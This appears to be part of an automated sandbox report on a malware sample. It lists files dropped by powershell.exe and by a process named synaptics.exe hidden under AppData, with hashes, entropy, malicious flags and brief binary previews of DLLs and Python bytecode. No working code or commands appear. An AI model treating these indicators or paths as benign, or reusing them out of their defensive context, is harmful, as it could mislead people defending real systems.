                                                                                                                                                                                                            File Type:MS Windows icon resource - 12 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 8 bits/pixel, 64x64, 8 bits/pixel
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):83351
                                                                                                                                                                                                            Entropy (8bit):6.269678824341842
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:fVLhV30CuzZO5Wf/DGsea4SNum23KXVDTEhr:f1hV3Uz447lea4muXG1TEhr
                                                                                                                                                                                                            MD5:1A8230030D821CF8EA57CE03AAEAD737
                                                                                                                                                                                                            SHA1:12656788B1FBE4D2375ECC2989A4D9DA69CAA0D6
                                                                                                                                                                                                            SHA-256:C4EC1845A5724B2A83500F3BD940355E2FE26EFC6B4FE6C208365359A6130DA1
                                                                                                                                                                                                            SHA-512:AF6356DC67249E724AE30F65DDEFB4E53C6F2703DA32FD5F135598BBD6189BEE70950242F52985478DE99979D1271EEC9F4E2981A29A9BC02C673E9B668FD0C1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:...............H......@@......(....I..00..........._.. ..........hn...............w..........h....}........ ..;..@...@@.... .(B../...00.... ..%..W... .... ......&........ ......7........ .h.../A...PNG........IHDR.............\r.f....pHYs..........o.d.. .IDATx..y...u.....u..l3..+Ar...)B..-.c...Y....X.$[....r..c.;>I..>..(...X.m%..G... ..H.....F,..f....~.T..W.^U...Yz.}.S....5.|....S^z.%H$...7 .H..i.$.e.4...2F...d.#..D....@"Y.H. .,c...H.1..H$..i.$.e.4...2F...d.#..D....@"Y.H. .,c...........B.d~H....G>.,.},%d. i......H. i9../.R..&!....0.C..&!...%.F.9H. iY...=..HZ.i.f.4...G...i.:.8....-..9.m..y>.G.\...x...~......O."......0".#F@..$c...B>.l&M=...........qm?>.K..?...azz:.Zi..#...E...../..t:.{...$C..IK0.n...._FGGG....#...e.\7......@...@.Rl...../J#.$.....[6..'_.9.f ...%..@s..@..H`.H. ii.l.......5.._..W.....@.......D....F.B...@....@.d.F 9..H.....$.....@...u3>.S...vzz..........@.$yx..~.g...w..Y.F@...E..x...,i...F...G..p...,...=.....f......@.lx..'..~H...b....,+.~.I|.#?.t
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):170264
                                                                                                                                                                                                            Entropy (8bit):6.693484567356425
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:M5QtHVOqzYcylPwZzS8JqTuo0BmSWjIuVBY/xux08YvVILLh8ptCuX5x+:M2tHjzYcyu+unESWXA/xaYvD0
                                                                                                                                                                                                            MD5:92C72753FA5C8EAA615B007F89CDB482
                                                                                                                                                                                                            SHA1:34238E31E0D963838FF551B184EAB3267767AD12
                                                                                                                                                                                                            SHA-256:EBBDE07AFB2BB356CD400E97D8AFB5ABBC121CC0CC90F99BEC9C3FA5CA60DE14
                                                                                                                                                                                                            SHA-512:A80BBA7095E7178591266E411414B3A6A2CBA09B79F330631AC07A72C6EB2AFD1C50D7346938ED337A911307B15660C17D14FACC7AFC6EFD9759BFBEC2121BD6
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......i^C.-?-.-?-.-?-.$G..#?-..J,./?-..J(.!?-..J).'?-..J../?-..J,./?-.fG,..?-.-?,._?-..J%.)?-..J-.,?-..J..,?-..J/.,?-.Rich-?-.........PE..L...M.,d...........!......................................................................@..........................:..P...`:.......p...............j.../......( ...5..T............................5..@............................................text............................... ..`.rdata...U.......V..................@..@.data........P.......2..............@....rsrc........p.......>..............@..@.reloc..( ......."...H..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):162444
                                                                                                                                                                                                            Entropy (8bit):6.899798696437328
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:t01xIh2ISDWCMiVQwmXWFRlbIMWa1PhWkRtjNsj2+1/L3kr7Sy5Pxy:t0HIcI7C/ZIWVbZhWijNsjxkrvxy
                                                                                                                                                                                                            MD5:830E831E1896D35A5E414D518AC05A2B
                                                                                                                                                                                                            SHA1:D43B639FA1D0614EE40A85483998ED7C4996AB19
                                                                                                                                                                                                            SHA-256:739B93F1ABFD7E6188F0C86172E526DAD72E29E0FC177E4B8C4E3686DD90AE9B
                                                                                                                                                                                                            SHA-512:81FD4E1E2D376262B9F0C235EA817ECD608FE3B734CA25715BA64E33D831A330DDE5D68C3F821C540B442727D3B008103E584E6CC91DACBA6F17C0D31A7CF4C8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:0..z...*.H.........zw0..zr...1.0...`.H.e......0..K...+.....7.....K.0..K.0...+.....7.....].GkN..D.n...]....230405005111Z0...+.....7.....0..K.0*......T...Q...w.Z...g.1.0...+.....7...1...0... ....%...%......*.].4i,`..(...1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ....%...%......*.].4i,`..(...0*....T..|../..IT....Q.1.0...+.....7...1...0*.....'......s..%R=5..1.0...+.....7...1...0*.....K..`....T...#\.1.0...+.....7...1...0*.....2m..3.......N..D1.0...+.....7...1...0... .......V.C.........>..wf...O...1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .......V.C.........>..wf...O...0*.....KG{6.8.o.<v.....1.0...+.....7...1...0*...7.d3t.[....Fh....!1.0...+.....7...1...0... .k.r.....r...K=.w.&.....mY+..1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .k.r.....r...K=.w.&.....mY+..0... .l..x....h......=....'&.ZZGe.7.31i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .l..x...
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):31213
                                                                                                                                                                                                            Entropy (8bit):7.250253600675095
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:e+Obmujt2xtYZtMPgs+03HQIYiSy1pCQAGy+Pxh8E9VF0NyOXz0:eE0tQYYPf5YiSyvny+PxWEUQ
                                                                                                                                                                                                            MD5:E33C9E857AD27ADBE33B26AB13890657
                                                                                                                                                                                                            SHA1:D70E576009A35D201399059DBE6DEAC35E1AC168
                                                                                                                                                                                                            SHA-256:EDE0345311D5D825BA03E10423CF51515B3F3962F1286E46E1E6198ADFEC67CF
                                                                                                                                                                                                            SHA-512:AC370602AC8E55E5B524AC5E961CC5185978AE8532A29F24B6F806E3355530C3F67127AC2F65FE4849AC8B354DE7D1102B8E11FB3C5457A5548B1125209FE913
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:0.y...*.H........y.0.y....1.0...`.H.e......0.K>..+.....7....K/0.K+0...+.....7.....1..4.&N....XE...230405005423Z0...+.....7.....0.J.0*......n)z;.....n7...1.0...+.....7...1...0... ..ok..m.e,W=:a.VS...<....v.L..1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ..ok..m.e,W=:a.VS...<....v.L..0... ..7]Y....M..u...8..([M.A...}...91i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ..7]Y....M..u...8..([M.A...}...90*....[2j[...kSR.V....81.0...+.....7...1...0... ...F....(.jg.cc]..<.t.1..a.&c\..1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ...F....(.jg.cc]..<.t.1..a.&c\..0... ..d...m..'...n.L!...>..S.sU.g.1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ..d...m..'...n.L!...>..S.sU.g.0... ..?..."`...^.M..|...D.....@C....1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ..?..."`...^.M..|...D.....@C....0*.....v.ow......6:.ZGU,1.0...+.....7...1...0... ..#|.!+.Hy
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):27416
                                                                                                                                                                                                            Entropy (8bit):6.835600420682668
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:+WFXERsAnq2NWow4VILQGR5YiSyvLPxWEa0P+:+xqwWow4VILQGf7SyzPx+
                                                                                                                                                                                                            MD5:6EBA3E39E61C839818F502BD67BBD672
                                                                                                                                                                                                            SHA1:CD724D843CA57F6EDBBBE94B3C352769F70AED65
                                                                                                                                                                                                            SHA-256:C942F16C17687E988434813E50D2FB222C528D0E56CCF2D15B13104676F93FC9
                                                                                                                                                                                                            SHA-512:8614F4DBF7DF68D66BA611B31135EB35EF5C6D24E1C3F3EC4E8DF67BE75102DA991F26FEA76EF930B686A1ED08AD4A4C5F62CB2BEA4233B26D276FFD3C54FC31
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5$..qE{.qE{.qE{.x=..sE{.#0z.sE{.#0~.zE{.#0..{E{.#0x.sE{..0z.sE{.qEz.LE{.:=z.tE{..0s.pE{..0{.pE{..0..pE{..0y.pE{.RichqE{.........PE..L...H.,d...........!........."...............0......................................u%....@..........................:..L....;..x....`...............<.../...p......D6..T............................6..@............0...............................text............................... ..`.rdata.."....0......................@..@.data........P......................@....rsrc........`.......0..............@..@.reloc.......p.......:..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1196824
                                                                                                                                                                                                            Entropy (8bit):6.776326140308749
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:E6OOR2q+dGpg4XzLojJT5r6hKarVTgnEEUNTZOdEV8RpDq+m5:zR2L94Xo5Q5OEeEYDzm5
                                                                                                                                                                                                            MD5:C60F6C4051EB55350C6EEDF5A87016AA
                                                                                                                                                                                                            SHA1:DB1C31C12BE04A5785D7CA3B8EA91B290EE9D1D8
                                                                                                                                                                                                            SHA-256:376D80DB08CEC2C8873A4D5EBC7D83F50F26A43EBAA837020874C8586FD85975
                                                                                                                                                                                                            SHA-512:FCBDFC27A778B1084BE96B88CF438E0937ADB8BABC41B538892B76283232AA557CE46701A8F62AB2FDB208AB0933F0E473CBD6DAD59203DC7495F48EE289B2A3
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z.............^....L.....L.....L.....L.....U.........................2..........Rich...................PE..L.....,d...........!................_........................................@.......7....@.........................`;..."...].........................../...........5..T........................... 6..@............................................text............................... ..`.rdata...Y.......Z..................@..@.data....'...p..."...Z..............@....rsrc................|..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1474800
                                                                                                                                                                                                            Entropy (8bit):6.693064675005823
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:V9CYAA+AJ5avXIDQQlu8X/7xTiD2gdQAroz+oYlhN1Rm9aoHjKQ+pA6EGnahTnt7:GPStQYPNT+ocQEkT0SEefL
                                                                                                                                                                                                            MD5:64A9F02985B69662983B961FB5535852
                                                                                                                                                                                                            SHA1:2D103C31C34ED6DD5CE5A7772CEC5089A5551847
                                                                                                                                                                                                            SHA-256:6E976F42E4FC77B13E2A2CAF8ABE1A2C359B5DB93CF2AC7B34BEFA8ABBCB8824
                                                                                                                                                                                                            SHA-512:1EBC5F5DEE13A4FDCFEE5F3C960CF1638F90E1779CBEB8F00C193DFC07E769D06726BE72DF053CE56C679AEBC57E2289416268F8FF52FCA6B948DC2B84055C12
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=.b.y...y...y...+...{.......z...+...r...+...s...+...w...p...k..."...x..."...t...y...a...............x.......x.......x...Richy...................PE..L......a...........!................................................................x.....@......................... 7...`......T.......8............d..........P....0...............................0..@............................................text...]........................... ..`.rdata..............................@..@.data...............................@....rsrc...8...........................@..@.reloc..P...........................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1244912
                                                                                                                                                                                                            Entropy (8bit):6.398486603474907
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:uJGo1/dDAMNmTWhBPj/VQ/GXbey2WaAXs3/920f8T2K/HRUvN6Dvd4LsmZ:ExTQ/Grey2pAXs3VM/RUEDvd4h
                                                                                                                                                                                                            MD5:4D4AFA9354DEA40CD52110D6B6C35936
                                                                                                                                                                                                            SHA1:9D61347241ACAE05F6D30CB400C7935CDEC327A3
                                                                                                                                                                                                            SHA-256:E775538B0E7D5A197BDCA3EC295610B8CA7B636FFA1F887F6E5D2C1E0BC88748
                                                                                                                                                                                                            SHA-512:60C0E9AC124AB763D67635539EB089D41C1BA7AB60E0D892064E905F3590D7859C63F26C262DF52209147F58321A3B0C9343F2028CC4FF5A020F249558016A79
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k)Z./H4./H4./H4.}=5.-H4.}=1.$H4.}=0.%H4.}=7.+H4.t 0.,H4..=0..H4.&0..?H4.t 5.:H4./H5.jI4..=<..H4..=4..H4..=..H4..=6..H4.Rich/H4.........................PE..L....a...........!.........^......................................................-....@.........................`...P@... ..|........{................... ..(...\...............................x...@............................................text...h........................... ..`.rdata..............................@..@.data...P\...@...T...,..............@....rsrc....{.......|..................@..@.reloc..(.... ......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1114904
                                                                                                                                                                                                            Entropy (8bit):5.393522969186712
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:PAKqQCb5Pfhnzr0qlmL8klMmuZ63NGM7IRG5eeIDe6VZyrIBHdQLhfFE+tc9S:PAKsZV0mmduJMMREtIC6Vo4uLc9S
                                                                                                                                                                                                            MD5:73A25EF47977BFF82315023F7F8E9DB1
                                                                                                                                                                                                            SHA1:9BD7882C39A995EA4044FB5D562060C16AF9A023
                                                                                                                                                                                                            SHA-256:AC2966C1A1F1FBEE97666E0AAADE5AB960B445AF3BACC1650B83EA8B637F2F7A
                                                                                                                                                                                                            SHA-512:C6155957E37C7A690E815F78508CCDCE9036E2EFFE45A9B47EAAFBB8A091D661B808C1A2CC6C7B83B41752121B869A877C981EE346B790F3CF3900A3D6F0B198
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........#..p..p..p...p..p..q..p..q...p..q..p..q..p..q..p..q..p..p...p..q..p..q..p..tp..p..q..pRich..p........................PE..L...K.,d...........!.....8...........=.......P.......................................X....@.............................X................................/..............T...........................P...@............P..,............................text...J7.......8.................. ..`.rdata...}...P...~...<..............@..@.data...8...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):27928
                                                                                                                                                                                                            Entropy (8bit):6.803210417146149
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:8wPBcVsin9R+URILO7I5YiSyvCJPxWEau:8wP2L9R+URILO767SyuPxb
                                                                                                                                                                                                            MD5:49F55D492AD016A6F0D0183768F8C903
                                                                                                                                                                                                            SHA1:0001BFFA17EEF519406710FA18808047EF19B590
                                                                                                                                                                                                            SHA-256:865C296E84C03E277145DC8DEE6E14C2AC418371A8D227576682ED596708EED8
                                                                                                                                                                                                            SHA-512:B0B57AF43FF2A3498EDCEEFAE71E253B3D9AEF23086D2BB41779A8B370BBA2801CA0CF5EFDD998E4415CB2EA61AFDA028BD1781C2DBBC8D1C157425B12D861DE
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6o..W.[.W.[.W.[./.[.W.[.".Z.W.[.".Z.W.[.".Z.W.[.".Z.W.[)".Z.W.[./.Z.W.[.W.[.W.[)".Z.W.[)".Z.W.[)".[.W.[)".Z.W.[Rich.W.[........................PE..L...L.,d...........!.........(...............0......................................3.....@..........................<..P...`<.......`...............>.../...p..X....7..T............................7..@............0...............................text...T........................... ..`.rdata.......0......................@..@.data...p....P......................@....rsrc........`.......0..............@..@.reloc..X....p.......:..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4155
                                                                                                                                                                                                            Entropy (8bit):5.363203962388916
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:CgdNzUuGd+P2sKNUW4om2j8kQAnPPELBG0uY:P4BRR4om1gPG00uY
                                                                                                                                                                                                            MD5:0A0B165B9DD5C5D0B2888F0BDBD273D9
                                                                                                                                                                                                            SHA1:CCBC5C67F30C552A46CA3CB720B5DD931248FEBC
                                                                                                                                                                                                            SHA-256:1DF545690312E42B0DC45F0F3E2F374434DCFC98FD840690B79EDBE73823DA9F
                                                                                                                                                                                                            SHA-512:49277F7717B7CCE7B51D53AEACE10BB0FC274112B3F127F0A9380FE8CE3DDA4BB39A3AD0772D61165E6B7F2AA10BE2D97DDB8B4DEC2EFC075E6E084A8BF5716F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.g.d...Z.d.g.e...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.G.d.d...d...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.d.S.).an...Record of phased-in incompatible language changes...Each line is of the form:.. FeatureName = "_Feature(" OptionalRelease "," MandatoryRelease ",". CompilerFlag ")"..where, normally, OptionalRelease < MandatoryRelease, and both are 5-tuples.of the same form as sys.version_info:.. (PY_MAJOR_VERSION, # the 2 in 2.1.0a3; an int. PY_MINOR_VERSION, # the 1; an int. PY_MICRO_VERSION, # the 0; an int. PY_RELEASE_LEVEL, # "alpha", "beta", "candidate" or "final"; string. PY_RELEASE_SERIAL # the 3; an int. )..OptionalRelease records the first release in which.. from __future__ import FeatureName..was accepted...In the case of MandatoryReleases that have not yet occurred,.MandatoryRelease pre
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):32949
                                                                                                                                                                                                            Entropy (8bit):5.03585044523216
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:ppDQ8l+6pg6mG5JlooICwimTmIufuBEQtJHVDOA/8AH:7pl+VVSooICwimT3ufu+AJ1DOcvH
                                                                                                                                                                                                            MD5:AD0EECFDD929A4BA0C3E09BD13A0476D
                                                                                                                                                                                                            SHA1:62C41945CF7C9109FB0DE3D24099C4953863823C
                                                                                                                                                                                                            SHA-256:071D93FE7FA1433D5D44F827775D3B2CD665C7C4AF12360D405ED2CF9E9419DD
                                                                                                                                                                                                            SHA-512:7D354F88C8091681CB13DAA090479F0C247D0482E7ED6BA6A5292E88EF0EC129D214130D8F44E310A12558C19B7CF982C25592BE63EC9C8242D779BC5B67D038
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF.3e(....G.dAdB..dBe;..ZGG.dCdD..dDeGeC..ZHeH.3e$..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5896
                                                                                                                                                                                                            Entropy (8bit):5.809212082993532
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:nPgbBl/+DrxavOvdW7KPSbM1Ybqc77ve6AVQWW8Mo20CaLXwQ55KL7KEQ:P9DVzTEM1O5GTvvXUL2EQ
                                                                                                                                                                                                            MD5:57F006A3ABD18454DA74271A31132214
                                                                                                                                                                                                            SHA1:A7E65DBB964315D550284D4FE77E5E730C536443
                                                                                                                                                                                                            SHA-256:0F37D849D3A352CBD0B7D1FF6ED7748334A726371863C2F2C4CB486BA227442F
                                                                                                                                                                                                            SHA-512:D63A0572EC3650E90C75B65B31569BDD642C05580A0CBE7039BAEE4F467B602BA7CEFD187832B0E5BE8E62B82096B8AD315F19DD4A9CD5A7C27EC35E6E2D11A0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d(#.......................@...s$...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d!..i.d"d#..d$d%..d&d'..d(d)..d*d+..d,d-..d.d/..d0d1..d2d3..d4d5..d6d7..d8d9..d:d;..d<d=..d>d?..d@dA..dBdC....dDdEdFdGdHdId2dJdK....Z.i.dLdM..dNdO..dPdQ..dRdS..dTdU..dVdW..dXdY..dZd[..d\d]..d^d_..d`da..dbdc..ddde..dfdg..dhdi..djdk..dldm..i.dndo..dpdq..drds..dtdu..dvdw..dxdy..dzd{..d|d}..d~d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....Z.d.Z.z.e...W.n...e.y.......Y.n.w.e.d.7.Z.e.D.].Z.d.e.f.e.d.e.f.<.q.d.Z.e.D.].Z.d.e.f.e.d.e.f.<...q.e.d.d...e.....D.....Z.e.e...e.e...k...s#J...e.d.d...e.....D.....Z.e.e...e.e...k...s9J...e...d.d.d.d.d9dDdDd.d.d.d2d.d.d.......e...d.d2d.d4d.d.......e...dUd.dcd.d.......e...dNd.d.d.d.d.d.d.d.d.d.d.d.d.......d.Z.e.D.].Z.d.e.d.e.f.<...qxd.Z.e.D.].Z.d.e.d.e.f.<...q.d.S.)...__builtin__..builtinsZ.copy_reg..copyreg..Queue..queueZ.SocketServerZ.socketserverZ.ConfigParserZ.configparser..repr..reprlibZ.tkFileDialog..tkint
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4536
                                                                                                                                                                                                            Entropy (8bit):5.144636090704415
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:xnAZIr5Xc+SHmtPK4Q9XEf9j0K5ULIPmwPu7gKxNW4q4RqOJd0f:xNxByEeIOQCxNWQRqOT0f
                                                                                                                                                                                                            MD5:85E7C6A0B41AA79A3A4A93BA5DAD610C
                                                                                                                                                                                                            SHA1:156521E3B73C1773712B108BEA008781F7E80074
                                                                                                                                                                                                            SHA-256:800C98EAF06299F9E2EFD8CADA4D3982ABC35E392006A3E47190AC34BB13D132
                                                                                                                                                                                                            SHA-512:DF17489809BF82CB9AE8FFA260B46FAC124400AF1044AD115593C0A1868C53CDC0A0E164AD00BDAA635B2B7FC3BB067F93405AA5D52AEA516749455DB9784CF7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sB...d.Z.d.d.l.Z.d.d.l.Z.e.j.Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.S.).z7Internal classes used by the gzip, lzma and bz2 modules.....Nc....................@...s0...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...BaseStreamz.Mode-checking helper functions.c....................C...s....|.j.r.t.d.....d.S.).Nz.I/O operation on closed file)...closed..ValueError....self..r.....;C:\Users\user\AppData\Local\xFSOj9El1Q\lib\_compression.py.._check_not_closed....s..........z.BaseStream._check_not_closedc....................C........|.....s.t...d.....d.S.).Nz.File not open for reading)...readable..io..UnsupportedOperationr....r....r....r......_check_can_read...............z.BaseStream._check_can_readc....................C...r....).Nz.File not open for writing)...writabler....r....r....r....r....r......_check_can_write....r....z.BaseStream._check_can_writec....................C...s(...|.....s.t...d.....|.....s.t...d.....d.S.).Nz3Seeking is only suppor
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3571
                                                                                                                                                                                                            Entropy (8bit):5.08001624286678
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:CsOn3Ch9/uydg7ls3pl+ltJ5+XdaCjteUzCt/BHKGZEIy0EEt:Cs8Cfcls3plwtJEXdaIeUzMJty0EG
                                                                                                                                                                                                            MD5:08F7A7928E4EE51E73B227283FCBD2A6
                                                                                                                                                                                                            SHA1:7FCD2466913B9415174F9887137698AFE2B190D1
                                                                                                                                                                                                            SHA-256:E03B556F52E4969A134328B6B7B2682724E59AC581CDFFCFD3560FBC9BB8821D
                                                                                                                                                                                                            SHA-512:69F837EE8B7DFE71B9D1F37BBBFD342A0FD10C1BD29B6C15E23D36D6F00911D6318DE8EEAE2993D087DDA8CF739AD499F65181F98083B6973F68A30675C1ACD0
                                                                                                                                                                                                            Malicious:false
